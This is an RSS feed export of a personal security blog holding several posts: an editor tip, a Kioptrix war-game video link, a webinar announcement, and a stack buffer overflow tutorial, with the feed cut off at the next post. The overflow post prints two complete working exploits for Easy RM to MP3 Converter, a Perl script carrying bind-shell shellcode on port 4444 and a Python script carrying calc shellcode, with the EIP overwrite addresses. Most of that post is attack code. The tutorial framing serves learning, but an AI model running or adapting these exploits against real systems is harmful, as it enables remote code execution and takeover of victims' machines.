<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	xmlns:georss="http://www.georss.org/georss" xmlns:geo="http://www.w3.org/2003/01/geo/wgs84_pos#" xmlns:media="http://search.yahoo.com/mrss/"
	>

<channel>
	<title>Lnxg33k&#039;s Blog</title>
	<atom:link href="http://lnxg33k.wordpress.com/feed/" rel="self" type="application/rss+xml" />
	<link>http://lnxg33k.wordpress.com</link>
	<description>Egyptions still R0X :)</description>
	<lastBuildDate>Fri, 27 Jan 2012 15:45:35 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.com/</generator>
<cloud domain='lnxg33k.wordpress.com' port='80' path='/?rsscloud=notify' registerProcedure='' protocol='http-post' />
<image>
		<url>http://1.gravatar.com/blavatar/b113078288d5a6f0ec58c98816922d35?s=96&#038;d=http%3A%2F%2Fs2.wp.com%2Fi%2Fbuttonw-com.png</url>
		<title>Lnxg33k&#039;s Blog</title>
		<link>http://lnxg33k.wordpress.com</link>
	</image>
	<atom:link rel="search" type="application/opensearchdescription+xml" href="http://lnxg33k.wordpress.com/osd.xml" title="Lnxg33k&#039;s Blog" />
	<atom:link rel='hub' href='http://lnxg33k.wordpress.com/?pushpress=hub'/>
		<item>
		<title>Django template syntax highlighting in Geany</title>
		<link>http://lnxg33k.wordpress.com/2012/01/27/django-template-syntax-highlighting-in-geany/</link>
		<comments>http://lnxg33k.wordpress.com/2012/01/27/django-template-syntax-highlighting-in-geany/#comments</comments>
		<pubDate>Fri, 27 Jan 2012 15:45:33 +0000</pubDate>
		<dc:creator>lnxg33k</dc:creator>
				<category><![CDATA[Articles]]></category>
		<category><![CDATA[Django]]></category>
		<category><![CDATA[Geany]]></category>
		<category><![CDATA[IDEs]]></category>
		<category><![CDATA[python]]></category>

		<guid isPermaLink="false">http://lnxg33k.wordpress.com/?p=347</guid>
		<description><![CDATA[During  working on iCrack I needed to highlight syntax {{ tag }}  in Django  template  system. One of the best IDEs is Geany cuz it has some features you will need while writing codes related to web-dev The issue is some of these IDEs still doesn&#8217;t support Django templates, and as Geany uses Scintilla as its highlighting engine you can enable highlighting [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=lnxg33k.wordpress.com&amp;blog=15018467&amp;post=347&amp;subd=lnxg33k&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>During  working on <a title="HashCracker" href="http://icrack.ep.io/" target="_blank">iCrack</a> I needed to highlight syntax {{ tag }}  in <a title="Django" href="https://www.djangoproject.com/" target="_blank">Django</a>  template  system.<br />
One of the best IDEs is <a title="GEANY" href="http://www.geany.org/" target="_blank">Geany</a> cuz it has some features you will need while writing codes related to web-dev</p>
<p>The issue is some of these IDEs still doesn&#8217;t support Django templates, and as Geany uses <a title="scintilla" href="http://www.scintilla.org/" target="_blank">Scintilla</a> as its highlighting engine you can enable highlighting by executing the following code inside your bash :</p>
<blockquote><p>
lnxg33k@Arabpwn:~$ sed &#8217;11i lexer.html.django=1&#8242; /usr/share/geany/filetypes.html &gt; ~/.config/geany/filedefs/filetypes.html
</p></blockquote>
<p>tested on <a title="Ubuntu" href="http://www.ubuntu.com/" target="_blank">Ubuntu 11.10</a> and geany 0.20 (built on Jul  1 2011 with GTK 2.24.5, GLib 2.29.8, GIO)</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/lnxg33k.wordpress.com/347/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/lnxg33k.wordpress.com/347/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/lnxg33k.wordpress.com/347/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/lnxg33k.wordpress.com/347/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/lnxg33k.wordpress.com/347/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/lnxg33k.wordpress.com/347/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/lnxg33k.wordpress.com/347/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/lnxg33k.wordpress.com/347/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/lnxg33k.wordpress.com/347/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/lnxg33k.wordpress.com/347/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/lnxg33k.wordpress.com/347/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/lnxg33k.wordpress.com/347/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/lnxg33k.wordpress.com/347/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/lnxg33k.wordpress.com/347/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=lnxg33k.wordpress.com&amp;blog=15018467&amp;post=347&amp;subd=lnxg33k&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://lnxg33k.wordpress.com/2012/01/27/django-template-syntax-highlighting-in-geany/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/caab8aa8798f1ce048893ddc62de657b?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">lnxg33k</media:title>
		</media:content>
	</item>
		<item>
		<title>Video: kioptrix level2 war-game solution</title>
		<link>http://lnxg33k.wordpress.com/2011/08/20/video-kioptrix-level2-war-game-solution/</link>
		<comments>http://lnxg33k.wordpress.com/2011/08/20/video-kioptrix-level2-war-game-solution/#comments</comments>
		<pubDate>Sat, 20 Aug 2011 22:31:56 +0000</pubDate>
		<dc:creator>lnxg33k</dc:creator>
				<category><![CDATA[Hacks]]></category>
		<category><![CDATA[command execution]]></category>
		<category><![CDATA[kioptrix]]></category>
		<category><![CDATA[sql injection]]></category>
		<category><![CDATA[sqll]]></category>

		<guid isPermaLink="false">http://lnxg33k.wordpress.com/?p=336</guid>
		<description><![CDATA[This Kioptrix VM Image are easy challenges. The object of the game is to acquire root access via any means possible (except actually hacking the VM server or player). The purpose of these games are to learn the basic tools and techniques in vulnerability assessment and exploitation. There are more ways then one to successfully [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=lnxg33k.wordpress.com&amp;blog=15018467&amp;post=336&amp;subd=lnxg33k&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p><a href="http://lnxg33k.files.wordpress.com/2011/08/newkioptrix_1.jpg"><img class="aligncenter size-full wp-image-339" title="Kioptrix" src="http://lnxg33k.files.wordpress.com/2011/08/newkioptrix_1.jpg?w=640" alt=""   /></a></p>
<p style="text-align:center;"><span id="more-336"></span></p>
<p>This Kioptrix VM Image are easy challenges. The object of the game is to acquire<br />
root access via any means possible (except actually hacking the VM server or player).<br />
The purpose of these games are to learn the basic tools and techniques in vulnerability<br />
assessment and exploitation. There are more ways then one to successfully complete the challenges.</p>
<p><a href="http://www.kioptrix.com/dlvm/Kioptrix_Level_2.rar">::: Download Level 1.1 :::</a> 415 Megs<br />
MD5 HASH: 9b7db76a1bf9d2074dc7fc17091444f4</p>
<span style="text-align:center; display: block;"><a href="http://lnxg33k.wordpress.com/2011/08/20/video-kioptrix-level2-war-game-solution/"><img src="http://img.youtube.com/vi/mVH8i95bwHI/2.jpg" alt="" /></a></span>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/lnxg33k.wordpress.com/336/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/lnxg33k.wordpress.com/336/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/lnxg33k.wordpress.com/336/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/lnxg33k.wordpress.com/336/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/lnxg33k.wordpress.com/336/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/lnxg33k.wordpress.com/336/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/lnxg33k.wordpress.com/336/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/lnxg33k.wordpress.com/336/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/lnxg33k.wordpress.com/336/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/lnxg33k.wordpress.com/336/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/lnxg33k.wordpress.com/336/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/lnxg33k.wordpress.com/336/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/lnxg33k.wordpress.com/336/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/lnxg33k.wordpress.com/336/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=lnxg33k.wordpress.com&amp;blog=15018467&amp;post=336&amp;subd=lnxg33k&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://lnxg33k.wordpress.com/2011/08/20/video-kioptrix-level2-war-game-solution/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/caab8aa8798f1ce048893ddc62de657b?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">lnxg33k</media:title>
		</media:content>

		<media:content url="http://lnxg33k.files.wordpress.com/2011/08/newkioptrix_1.jpg" medium="image">
			<media:title type="html">Kioptrix</media:title>
		</media:content>
	</item>
		<item>
		<title>&#8220;How to think like a HACKER ?&#8221; Webinar event</title>
		<link>http://lnxg33k.wordpress.com/2011/07/19/how-to-think-like-a-hacker-webinar-event/</link>
		<comments>http://lnxg33k.wordpress.com/2011/07/19/how-to-think-like-a-hacker-webinar-event/#comments</comments>
		<pubDate>Tue, 19 Jul 2011 17:39:28 +0000</pubDate>
		<dc:creator>lnxg33k</dc:creator>
				<category><![CDATA[Articles]]></category>
		<category><![CDATA[CEH]]></category>
		<category><![CDATA[ec-council]]></category>
		<category><![CDATA[events]]></category>

		<guid isPermaLink="false">http://lnxg33k.wordpress.com/?p=320</guid>
		<description><![CDATA[Hey folks it&#8217;s been quite a while since my last post &#8216;exams sucks&#8217;. Actually I planned to  publish this post on  isecur1ty in Arabic but due to some issues with it&#8217;s contents it will be available on my blog About 3 days ago I received an email from  an Academic Advisor at Ec-Council University Egypt branch inviting [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=lnxg33k.wordpress.com&amp;blog=15018467&amp;post=320&amp;subd=lnxg33k&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p style="text-align:center;"><a href="http://lnxg33k.files.wordpress.com/2011/07/att00001.jpg"><img class="aligncenter size-full wp-image-332" title="ec-council" src="http://lnxg33k.files.wordpress.com/2011/07/att00001.jpg?w=640" alt=""   /><span id="more-320"></span></a></p>
<p>Hey folks it&#8217;s been quite a while since my last post <img src='http://s0.wp.com/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' />  &#8216;exams sucks&#8217;.</p>
<p>Actually I planned to  publish this post on  <a title="isecur1ty community" href="http://www.isecur1ty.org/">isecur1ty</a> in Arabic but due to some issues with it&#8217;s contents it will be available on my blog</p>
<p>About 3 days ago I received an email from  an Academic Advisor at Ec-Council University Egypt branch inviting me to a webinar event it’s topic” How to think like a hacker ?“.  During the session Eng/Mohamed Ehsafeey will present some interesting topics</p>
<p>- attacks types, methods and tools<br />
- How attackers getting access to an organization<br />
- How to know new Threats to implement more secure solution<br />
- How to penetrate a machine<br />
- Securing your Network<br />
- Information security professionals Diplomas<br />
- How to apply to EC-Council Uni. ?</p>
<p>Title: How to think like a HACKER ?<br />
Date : Saturday, Jul 23, 2011<br />
Time : 6:30 PM &#8211; 10:00 PM EEST<br />
Language: it will be presented in Arabic</p>
<p>System Requirements<br />
PC-based attendees<br />
Required: Windows® 7, Vista, XP or 2003 Server<br />
Macintosh®-based attendees<br />
Required: Mac OS® X 10.5 or newe</p>
<p>Reserve your Webinar seat now from <a title="register" href="https://www3.gotomeeting.com/register/388224862">here</a></p>
<p>It&#8217;s great to watch this big jump in information security arena in Arabian countries as i will write a bout another interesting event which will be held soon here in Egypt.</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/lnxg33k.wordpress.com/320/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/lnxg33k.wordpress.com/320/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/lnxg33k.wordpress.com/320/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/lnxg33k.wordpress.com/320/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/lnxg33k.wordpress.com/320/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/lnxg33k.wordpress.com/320/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/lnxg33k.wordpress.com/320/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/lnxg33k.wordpress.com/320/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/lnxg33k.wordpress.com/320/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/lnxg33k.wordpress.com/320/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/lnxg33k.wordpress.com/320/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/lnxg33k.wordpress.com/320/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/lnxg33k.wordpress.com/320/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/lnxg33k.wordpress.com/320/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=lnxg33k.wordpress.com&amp;blog=15018467&amp;post=320&amp;subd=lnxg33k&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://lnxg33k.wordpress.com/2011/07/19/how-to-think-like-a-hacker-webinar-event/feed/</wfw:commentRss>
		<slash:comments>5</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/caab8aa8798f1ce048893ddc62de657b?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">lnxg33k</media:title>
		</media:content>

		<media:content url="http://lnxg33k.files.wordpress.com/2011/07/att00001.jpg" medium="image">
			<media:title type="html">ec-council</media:title>
		</media:content>
	</item>
		<item>
		<title>Video: buffer overflow exploitation (Stack Based)</title>
		<link>http://lnxg33k.wordpress.com/2011/04/07/video-buffer-overflow-exploitation-stack-based/</link>
		<comments>http://lnxg33k.wordpress.com/2011/04/07/video-buffer-overflow-exploitation-stack-based/#comments</comments>
		<pubDate>Thu, 07 Apr 2011 07:45:08 +0000</pubDate>
		<dc:creator>lnxg33k</dc:creator>
				<category><![CDATA[BOF]]></category>
		<category><![CDATA[buffer overflow]]></category>
		<category><![CDATA[EIP]]></category>
		<category><![CDATA[stack]]></category>

		<guid isPermaLink="false">http://lnxg33k.wordpress.com/?p=295</guid>
		<description><![CDATA[i followed corelan tutorials for BOF exploitation (Which are awesome ) so i will convert it into videos and i will use Python instead of Perl the fisrt tut about a vulnerability in Easy RM to MP3 Conversion Utility which was reported by Crazy_Hacker with a POC (SP2 ENG) doesn&#8217;t work for me corelanc0d3r rewrote the [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=lnxg33k.wordpress.com&amp;blog=15018467&amp;post=295&amp;subd=lnxg33k&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>i followed <a title="BOF pt1" href="http://www.corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/" target="_blank">corelan tutorials for BOF exploitation</a> (Which are awesome )   so i will convert it into videos and i will use Python instead of Perl</p>
<p>the fisrt tut about a vulnerability in <a href="http://www.rm-to-mp3.net/download.html" target="_blank">Easy RM to MP3 Conversion Utility<br />
</a>which was reported by Crazy_Hacker with a POC (SP2 ENG) doesn&#8217;t work for me</p>
<p><span id="more-295"></span></p>
<p>corelanc0d3r rewrote the exploit to work under SP3 :</p>
<blockquote>
<pre>#
# Exploit for Easy RM to MP3 27.3.700 vulnerability, discovered by Crazy_Hacker
# Written by Peter Van Eeckhoutte
# http://www.corelan.be:8800
# Greetings to Saumil and SK <img src='http://s0.wp.com/wp-includes/images/smilies/icon_smile.gif' alt=':-)' class='wp-smiley' />
#
# tested on Windows XP SP3 (En)
#
#
#
my $file= "exploitrmtomp3.m3u";

my $junk= "A" x 26094;
my $eip = pack('V',0x01ccf23a);  #jmp esp from MSRMCcodec02.dll

my $shellcode = "\x90" x 25;

# windows/shell_bind_tcp - 703 bytes
# http://www.metasploit.com
# Encoder: x86/alpha_upper
# EXITFUNC=seh, LPORT=4444, RHOST=
$shellcode=$shellcode."\x89\xe1\xdb\xd4\xd9\x71\xf4\x58\x50\x59\x49\x49\x49\x49" .
"\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56" .
"\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41" .
"\x42\x41\x41\x42\x54\x00\x41\x51\x32\x41\x42\x32\x42\x42" .
"\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x42" .
"\x4a\x4a\x4b\x50\x4d\x4b\x58\x4c\x39\x4b\x4f\x4b\x4f\x4b" .
"\x4f\x43\x50\x4c\x4b\x42\x4c\x51\x34\x51\x34\x4c\x4b\x47" .
"\x35\x47\x4c\x4c\x4b\x43\x4c\x44\x45\x44\x38\x45\x51\x4a" .
"\x4f\x4c\x4b\x50\x4f\x42\x38\x4c\x4b\x51\x4f\x51\x30\x43" .
"\x31\x4a\x4b\x50\x49\x4c\x4b\x46\x54\x4c\x4b\x43\x31\x4a" .
"\x4e\x46\x51\x49\x50\x4a\x39\x4e\x4c\x4d\x54\x49\x50\x44" .
"\x34\x45\x57\x49\x51\x49\x5a\x44\x4d\x43\x31\x49\x52\x4a" .
"\x4b\x4a\x54\x47\x4b\x51\x44\x51\x34\x47\x58\x44\x35\x4a" .
"\x45\x4c\x4b\x51\x4f\x47\x54\x43\x31\x4a\x4b\x45\x36\x4c" .
"\x4b\x44\x4c\x50\x4b\x4c\x4b\x51\x4f\x45\x4c\x45\x51\x4a" .
"\x4b\x44\x43\x46\x4c\x4c\x4b\x4d\x59\x42\x4c\x46\x44\x45" .
"\x4c\x43\x51\x48\x43\x46\x51\x49\x4b\x45\x34\x4c\x4b\x50" .
"\x43\x50\x30\x4c\x4b\x51\x50\x44\x4c\x4c\x4b\x42\x50\x45" .
"\x4c\x4e\x4d\x4c\x4b\x51\x50\x45\x58\x51\x4e\x43\x58\x4c" .
"\x4e\x50\x4e\x44\x4e\x4a\x4c\x50\x50\x4b\x4f\x48\x56\x43" .
"\x56\x50\x53\x45\x36\x45\x38\x50\x33\x50\x32\x42\x48\x43" .
"\x47\x43\x43\x47\x42\x51\x4f\x50\x54\x4b\x4f\x48\x50\x42" .
"\x48\x48\x4b\x4a\x4d\x4b\x4c\x47\x4b\x50\x50\x4b\x4f\x48" .
"\x56\x51\x4f\x4d\x59\x4d\x35\x45\x36\x4b\x31\x4a\x4d\x43" .
"\x38\x43\x32\x46\x35\x43\x5a\x44\x42\x4b\x4f\x4e\x30\x42" .
"\x48\x48\x59\x45\x59\x4c\x35\x4e\x4d\x50\x57\x4b\x4f\x48" .
"\x56\x46\x33\x46\x33\x46\x33\x50\x53\x50\x53\x50\x43\x51" .
"\x43\x51\x53\x46\x33\x4b\x4f\x4e\x30\x43\x56\x45\x38\x42" .
"\x31\x51\x4c\x42\x46\x46\x33\x4c\x49\x4d\x31\x4a\x35\x42" .
"\x48\x4e\x44\x44\x5a\x44\x30\x49\x57\x50\x57\x4b\x4f\x48" .
"\x56\x43\x5a\x44\x50\x50\x51\x51\x45\x4b\x4f\x4e\x30\x43" .
"\x58\x49\x34\x4e\x4d\x46\x4e\x4b\x59\x50\x57\x4b\x4f\x4e" .
"\x36\x50\x53\x46\x35\x4b\x4f\x4e\x30\x42\x48\x4d\x35\x50" .
"\x49\x4d\x56\x50\x49\x51\x47\x4b\x4f\x48\x56\x50\x50\x50" .
"\x54\x50\x54\x46\x35\x4b\x4f\x48\x50\x4a\x33\x45\x38\x4a" .
"\x47\x44\x39\x48\x46\x43\x49\x50\x57\x4b\x4f\x48\x56\x50" .
"\x55\x4b\x4f\x48\x50\x42\x46\x42\x4a\x42\x44\x45\x36\x45" .
"\x38\x45\x33\x42\x4d\x4d\x59\x4b\x55\x42\x4a\x46\x30\x50" .
"\x59\x47\x59\x48\x4c\x4b\x39\x4a\x47\x43\x5a\x50\x44\x4b" .
"\x39\x4b\x52\x46\x51\x49\x50\x4c\x33\x4e\x4a\x4b\x4e\x47" .
"\x32\x46\x4d\x4b\x4e\x51\x52\x46\x4c\x4d\x43\x4c\x4d\x42" .
"\x5a\x50\x38\x4e\x4b\x4e\x4b\x4e\x4b\x43\x58\x42\x52\x4b" .
"\x4e\x4e\x53\x42\x36\x4b\x4f\x43\x45\x51\x54\x4b\x4f\x49" .
"\x46\x51\x4b\x46\x37\x46\x32\x50\x51\x50\x51\x46\x31\x42" .
"\x4a\x45\x51\x46\x31\x46\x31\x51\x45\x50\x51\x4b\x4f\x48" .
"\x50\x43\x58\x4e\x4d\x4e\x39\x45\x55\x48\x4e\x51\x43\x4b" .
"\x4f\x49\x46\x43\x5a\x4b\x4f\x4b\x4f\x47\x47\x4b\x4f\x48" .
"\x50\x4c\x4b\x46\x37\x4b\x4c\x4c\x43\x49\x54\x45\x34\x4b" .
"\x4f\x4e\x36\x50\x52\x4b\x4f\x48\x50\x43\x58\x4c\x30\x4c" .
"\x4a\x44\x44\x51\x4f\x46\x33\x4b\x4f\x48\x56\x4b\x4f\x48" .
"\x50\x41\x41";

open($FILE,"&gt;$file");
print $FILE $junk.$eip.$shellcode;
close($FILE);
print "m3u File Created successfully\n";</pre>
</blockquote>
<p>I tried the exploit under (SP2 ENG) and found it doesn&#8217;t work. So i wrote the exploit in Python:</p>
<blockquote><p>#!/usr/bin/env python<br />
#<br />
# Easy RM to MP3 Converter 2.7.3.700 (.m3u) File Universal Buffer Overflow Exploit<br />
# Vulnerability discovered by Crazy_Hacker who reported with a POC<br />
# The poc was for SP2 (it doesn&#8217;t work) http://packetstormsecurity.org/files/view/79307/easyrmmp3-overflow.txt<br />
# Corelanc0d3r wrote the sploit again but to work under SP3<br />
# http://www.corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/<br />
#</p>
<p>import sys</p>
<p>m3uf = sys.argv[1]</p>
<p>buff  = &#8216;A&#8217; *26072<br />
buff += &#8216;\x3a\xf2\xa8\x01&#8242;              # EIP overwrite MSRMCc_2 (01A8F23A JMP ESP)<br />
buff += &#8216;CCCC&#8217;                          # 4 bytes of garbage<br />
buff += &#8216;\x90&#8242; *25                      # 25 bytes of nop sleds</p>
<p># sh-4.1$ msfpayload windows/exec CMD=calc r | msfencode -a x86 -b &#8216;\x00\x09\x0a&#8217; -t c<br />
buff += (&#8220;\xba\xf8\x41\x8a\x4a\xd9\xf7\xd9\x74\x24\xf4\x5b\x2b\xc9\xb1&#8243;<br />
&#8220;\x32\x83\xeb\xfc\x31\x53\x0e\x03\xab\x4f\x68\xbf\xb7\xb8\xe5&#8243;<br />
&#8220;\x40\x47\x39\x96\xc9\xa2\x08\x84\xae\xa7\x39\x18\xa4\xe5\xb1&#8243;<br />
&#8220;\xd3\xe8\x1d\x41\x91\x24\x12\xe2\x1c\x13\x1d\xf3\x90\x9b\xf1&#8243;<br />
&#8220;\x37\xb2\x67\x0b\x64\x14\x59\xc4\x79\x55\x9e\x38\x71\x07\x77&#8243;<br />
&#8220;\x37\x20\xb8\xfc\x05\xf9\xb9\xd2\x02\x41\xc2\x57\xd4\x36\x78&#8243;<br />
&#8220;\x59\x04\xe6\xf7\x11\xbc\x8c\x50\x82\xbd\x41\x83\xfe\xf4\xee&#8221;<br />
&#8220;\x70\x74\x07\x27\x49\x75\x36\x07\x06\x48\xf7\x8a\x56\x8c\x3f&#8221;<br />
&#8220;\x75\x2d\xe6\x3c\x08\x36\x3d\x3f\xd6\xb3\xa0\xe7\x9d\x64\x01&#8243;<br />
&#8220;\x16\x71\xf2\xc2\x14\x3e\x70\x8c\x38\xc1\x55\xa6\x44\x4a\x58&#8243;<br />
&#8220;\x69\xcd\x08\x7f\xad\x96\xcb\x1e\xf4\x72\xbd\x1f\xe6\xda\x62&#8243;<br />
&#8220;\xba\x6c\xc8\x77\xbc\x2e\x86\x86\x4c\x55\xef\x89\x4e\x56\x5f&#8221;<br />
&#8220;\xe2\x7f\xdd\x30\x75\x80\x34\x75\x89\xca\x15\xdf\x02\x93\xcf&#8221;<br />
&#8220;\x62\x4f\x24\x3a\xa0\x76\xa7\xcf\x58\x8d\xb7\xa5\x5d\xc9\x7f&#8221;<br />
&#8220;\x55\x2f\x42\xea\x59\x9c\x63\x3f\x3a\x43\xf0\xa3\xbd&#8221;)</p>
<p>f= open(m3uf, &#8216;w&#8217;)<br />
f.write(buff)<br />
f.close<br />
print &#8216;\n[+] File written successfully in %s\n&#8217; % m3uf</p></blockquote>
<p>Check out the video:<br />
<span style="text-align:center; display: block;"><a href="http://lnxg33k.wordpress.com/2011/04/07/video-buffer-overflow-exploitation-stack-based/"><img src="http://img.youtube.com/vi/mfF88nOlUiw/2.jpg" alt="" /></a></span></p>
<p>script i used in the tutorial:<br />
<a title="m3u.py" href="http://lnxg33k.googlecode.com/files/m3u.py" target="_blank"> m3u.py download</a><br />
the exploit in python:<br />
<a href="http://lnxg33k.googlecode.com/files/Easy_RM_to_MP3-exp.py">Easy_RM_to_MP3-exp.py download</a></p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/lnxg33k.wordpress.com/295/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/lnxg33k.wordpress.com/295/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/lnxg33k.wordpress.com/295/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/lnxg33k.wordpress.com/295/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/lnxg33k.wordpress.com/295/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/lnxg33k.wordpress.com/295/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/lnxg33k.wordpress.com/295/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/lnxg33k.wordpress.com/295/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/lnxg33k.wordpress.com/295/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/lnxg33k.wordpress.com/295/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/lnxg33k.wordpress.com/295/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/lnxg33k.wordpress.com/295/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/lnxg33k.wordpress.com/295/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/lnxg33k.wordpress.com/295/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=lnxg33k.wordpress.com&amp;blog=15018467&amp;post=295&amp;subd=lnxg33k&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://lnxg33k.wordpress.com/2011/04/07/video-buffer-overflow-exploitation-stack-based/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/caab8aa8798f1ce048893ddc62de657b?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">lnxg33k</media:title>
		</media:content>
	</item>
		<item>
		<title>Scripts: icrack (python md5 cracker [online &#124; offline])</title>
		<link>http://lnxg33k.wordpress.com/2011/03/05/scripts-md5-hash-cracker-online-offline/</link>
		<comments>http://lnxg33k.wordpress.com/2011/03/05/scripts-md5-hash-cracker-online-offline/#comments</comments>
		<pubDate>Sat, 05 Mar 2011 07:43:30 +0000</pubDate>
		<dc:creator>lnxg33k</dc:creator>
				<category><![CDATA[My scripts]]></category>
		<category><![CDATA[hash]]></category>
		<category><![CDATA[icrack]]></category>
		<category><![CDATA[md5]]></category>
		<category><![CDATA[python]]></category>
		<category><![CDATA[scripts]]></category>

		<guid isPermaLink="false">http://lnxg33k.wordpress.com/?p=239</guid>
